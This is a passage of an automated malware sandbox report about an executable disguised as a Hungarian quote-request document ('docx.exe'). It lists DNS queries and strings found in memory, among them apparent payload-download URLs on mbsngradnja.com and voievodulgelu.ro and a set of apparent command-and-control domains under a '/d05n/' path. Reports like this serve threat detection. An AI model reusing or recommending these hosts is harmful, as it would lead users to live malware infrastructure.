          Source: global trafficDNS traffic detected: DNS query: voievodulgelu.ro
          Source: global trafficDNS traffic detected: DNS query: mbsngradnja.com
          Source: global trafficDNS traffic detected: DNS query: www.egos.design
          Source: global trafficDNS traffic detected: DNS query: www.xc31.top
          Source: global trafficDNS traffic detected: DNS query: www.ursing-caregiver-jobs-za-3.bond
          Source: global trafficDNS traffic detected: DNS query: www.trl-migrate.online
          Source: global trafficDNS traffic detected: DNS query: www.r-outsourcing-69869.bond
          Source: global trafficDNS traffic detected: DNS query: www.apaescortatings.xyz
          Source: global trafficDNS traffic detected: DNS query: www.ynthia-mcc-lin-tick.link
          Source: global trafficDNS traffic detected: DNS query: www.atingdilse.site
          Source: global trafficDNS traffic detected: DNS query: www.joops.music
          Source: global trafficDNS traffic detected: DNS query: www.upta.bio
          Source: global trafficDNS traffic detected: DNS query: www.9838.xyz
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
          Source: explorer.exe, 00000006.00000003.3107012452.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1799656853.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1790982592.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4174806858.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
          Source: explorer.exe, 00000006.00000003.3107012452.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1799656853.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1790982592.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4174806858.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
          Source: explorer.exe, 00000006.00000003.3107012452.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1799656853.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1790982592.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4174806858.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1802025205.00000000207A3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://mbsngradnja.com/244_Rgzwnbqrkpn
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1781016526.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mbsngradnja.com/244_Rgzwnbqrkpn4W
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1781016526.0000000000597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mbsngradnja.com/244_RgzwnbqrkpnZ
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1781016526.00000000005B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mbsngradnja.com/244_Rgzwnbqrkpnb:$
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1781016526.0000000000597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mbsngradnja.com/244_Rgzwnbqrkpnv
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1781016526.00000000005C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mbsngradnja.com/t
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1781016526.00000000005C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mbsngradnja.com:80/244_Rgzwnbqrkpn
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
          Source: explorer.exe, 00000006.00000003.3107012452.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1799656853.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1790982592.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4174806858.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
          Source: explorer.exe, 00000006.00000000.1790982592.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
          Source: explorer.exe, 00000006.00000000.1792661792.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1803231829.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1794996906.0000000008720000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1802025205.00000000207A3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://voievodulgelu.ro/244_Rgzwnbqrkpn
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1781016526.000000000056B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://voievodulgelu.ro/244_Rgzwnbqrkpnl
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.9838.xyz
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.9838.xyz/d05n/
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.9838.xyz/d05n/www.ybzert.online
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.9838.xyzReferer:
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.apaescortatings.xyz
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.apaescortatings.xyz/d05n/
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.apaescortatings.xyz/d05n/www.ynthia-mcc-lin-tick.link
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.apaescortatings.xyzReferer:
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.atingdilse.site
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.atingdilse.site/d05n/
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.atingdilse.site/d05n/www.joops.music
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.atingdilse.siteReferer:
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eanliving.site
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eanliving.site/d05n/
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eanliving.site/d05n/www.egakids.shop
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eanliving.siteReferer:
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.egakids.shop
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.egakids.shop/d05n/
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.egakids.shop/d05n/www.ental-implants-50062.bond
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.egakids.shopReferer:
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.egos.design
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.egos.design/d05n/
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.egos.design/d05n/www.xc31.top
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.egos.designReferer:
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ental-implants-50062.bond
          Source: explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ental-implants-50062.bond/d05n/
